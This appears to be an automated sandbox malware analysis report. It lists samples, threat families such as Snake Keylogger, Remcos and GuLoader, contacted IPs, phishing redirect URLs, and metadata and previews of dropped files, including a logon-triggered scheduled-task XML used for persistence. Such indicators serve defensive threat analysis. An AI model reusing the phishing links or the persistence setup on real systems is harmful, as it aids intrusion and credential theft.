tGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUhesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousDynamic StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                      • 149.154.167.99
                                                                                      https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      ACPCApbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                                      • 162.65.144.8
https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/ | malicious | Unknown | 162.55.246.61
mipsel.nn.elf | malicious | Mirai, Okiru | 162.52.56.205
nabm68k.elf | malicious | Unknown | 162.48.203.221
FATURA.exe | malicious | FormBook | 162.0.209.213
loligang.spc.elf | malicious | Mirai | 162.10.7.182
Purchase Order AB013058.PDF.exe | malicious | DarkCloud, PureLog Stealer | 162.55.60.2
MSM8C42iAN.exe | malicious | DarkCloud | 162.55.60.2
wMy37vlfvz.exe | malicious | DarkCloud | 162.55.60.2
TAX INVOICE.exe | malicious | FormBook | 162.0.209.213
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
faktura461250706050720242711#U00b7pdf.vbs | malicious | Remcos, GuLoader | 149.154.167.220
rXVQIR00071840-180218627117.exe | malicious | FormBook, GuLoader | 149.154.167.220
SOLICITUD DE PRESUPUESTO 27-11-2024#U00b7pdf.vbs | malicious | Remcos, GuLoader | 149.154.167.220
factura_461250706050720242711#U00b7pdf.vbs | malicious | Remcos, GuLoader | 149.154.167.220
Purchase-Order27112024.scr.exe | malicious | Remcos, GuLoader | 149.154.167.220
Update.js | malicious | NetSupport RAT | 149.154.167.220
z34SOLICITUDDEP.vbs | malicious | Remcos, GuLoader | 149.154.167.220
SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbs | malicious | GuLoader, Remcos | 149.154.167.220
file.exe | malicious | Amadey, Stealc, Vidar | 149.154.167.220
awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs | malicious | GuLoader, Remcos | 149.154.167.220
                                                                                      No context
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                                      Malicious:true
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2232
                                                                                      Entropy (8bit):5.380503343696294
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:SWSU4xympx4RfoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:SLHxv/IwLZ2KRH6OugEs
                                                                                      MD5:0E8146C45B3D8B88FC48CEFF78B7CEB9
                                                                                      SHA1:DBF2CE66F704F075D22B41831CB822AA84B418EC
                                                                                      SHA-256:B5AF8478C918C666AD85FE02EBBD7682947E29DAAD9EFFE371A2AD99EA89DD38
                                                                                      SHA-512:3655F497858B4B29494D4C79599ECE11066CA27C13D7528CFD7EB2D5571A7050F61D282DCCDE2E04631003CCEA19A32339B8F6E236B8E174B5162C40EE896DC5
                                                                                      Malicious:false
                                                                                      Preview:@...e.................................K..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):18274
                                                                                      Entropy (8bit):7.836906789761796
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:eoytdoytxDnoLUkMpuzx9GtkGtMtNts7NoNBTr:FyQyDnow3puzit/tMntso
                                                                                      MD5:9E8B01E30341F8304B95AD58053E3554
                                                                                      SHA1:F24F7636E72FA9F8219480B0EFAA0BDCE1B4218F
                                                                                      SHA-256:6A575630266F47B4CE3E673C5A3F1B9944016E8C9B5D8718C65B73394919AA0E
                                                                                      SHA-512:0DC8F41D969EA28A811F01B53D5EE5B3D1EBF4189D57C37D5BFA353C84160103F799F8B9B8C000E9E260A09B1FD7A6F53023589BE0B8A3B2F82F1B0D02696B2C
                                                                                      Malicious:false
                                                                                      Preview:PK........%JDW...............Files/AFWAAFRXKO.docx..Ir@!.D.......... 1[.Tw...V..I5....D....&.....t5....C.P.xt.;...9.u..)nh..p.I.....)*.}.... ...dBp...:.t%..'..l..P..KN9Q.a..BX.r+B[7..v.?.|......]0B.:.vB=....5. ....f.\....".....".Tm./.$...g.C....m..GLS5...I.6.u/MU.5.^.w......-.H=.v..... ..o#.....LJu..g.M..r.9..s.....jq..r{....0.......Vk2.... ..../...GS.......X*n.j.$hA...$.....w..Ji.......e..b.~e...t....AW.Kd.R..........Z.m.p..n<...6.....9.]n.|;t..2.}..=:~...s_dS..K...<...N...Q..%.Lz.E/..{..".F..s............-.{.v.lp.3,{..Tf...>.{..[......fz.............{k.O.V..l......<... ...u..O-.tV'.t.Y..UsmX.[....<.!..`}.v....)...H.U.s....n.......=.J .......PK........%JDW...............Files/AFWAAFRXKO.pdf..Ir@!.D.......... 1[.Tw...V..I5....D....&.....t5....C.P.xt.;...9.u..)nh..p.I.....)*.}.... ...dBp...:.t%..'..l..P..KN9Q.a..BX.r+B[7..v.?.|......]0B.:.vB=....5. ....f.\....".....".Tm./.$...g.C....m..GLS5...I.6.u/MU.5.^.w......-.H=.v..... .
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1583
                                                                                      Entropy (8bit):5.109374393038211
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuTgv
                                                                                      MD5:A94F197BDC1DA87510AD2CC4FCA814E4
                                                                                      SHA1:84E266B557FADEF97A94C8942A7FB5701E718B4A
                                                                                      SHA-256:C2BB9ED76A98B48FE529949FB409F2C2CE60D742C80E6118560CA062A7AA74C7
                                                                                      SHA-512:7F0656BA4EC8EFF09223AA638756B1DEF84D0D66B91C18EF406496DB33BABE209D8E05BFA00D9C266EAC8B99CC04553FC8BC1549C077F3C535EC36193C387F50
                                                                                      Malicious:true
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1583
                                                                                      Entropy (8bit):5.109374393038211
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Kxvn:cgergYrFdOFzOzN33ODOiDdKrsuTgv
                                                                                      MD5:A94F197BDC1DA87510AD2CC4FCA814E4
                                                                                      SHA1:84E266B557FADEF97A94C8942A7FB5701E718B4A
                                                                                      SHA-256:C2BB9ED76A98B48FE529949FB409F2C2CE60D742C80E6118560CA062A7AA74C7
                                                                                      SHA-512:7F0656BA4EC8EFF09223AA638756B1DEF84D0D66B91C18EF406496DB33BABE209D8E05BFA00D9C266EAC8B99CC04553FC8BC1549C077F3C535EC36193C387F50
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:Zip archive data (empty)
                                                                                      Category:dropped
                                                                                      Size (bytes):24
                                                                                      Entropy (8bit):1.4575187496394222
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:pjt/lC:NtU
                                                                                      MD5:98A833E15D18697E8E56CDAFB0642647
                                                                                      SHA1:E5F94D969899646A3D4635F28A7CD9DD69705887
                                                                                      SHA-256:FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
                                                                                      SHA-512:C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
                                                                                      Malicious:false
                                                                                      Preview:PK......................
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6868290294905215
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
                                                                                      MD5:E655D05DEDA782A6FE1E44028236D3A4
                                                                                      SHA1:ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
                                                                                      SHA-256:69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
                                                                                      SHA-512:25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690067217069288
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                      MD5:4E32787C3D6F915D3CB360878174E142
                                                                                      SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                      SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                      SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.699548026888946
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                      MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                      SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                      SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                      SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698193102830694
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                                      Malicious:false
                                                                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704010251295094
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
                                                                                      MD5:DF05C5F93419C56BFE3A84BDCC929382
                                                                                      SHA1:36AABBCD46C0F368E18FA602E486816D2578F48E
                                                                                      SHA-256:F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
                                                                                      SHA-512:EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.699434772658264
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                      MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                      SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                      SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                      SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Roaming\XgbXowhljC.exe
                                                                                      File Type:PSA archive data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.698960923923406
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
                                                                                      MD5:186B4E00711974F7AF578BD6FF959BBF
                                                                                      SHA1:642B794D73FB09655FBFF8EDCAAA267634554569
                                                                                      SHA-256:2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
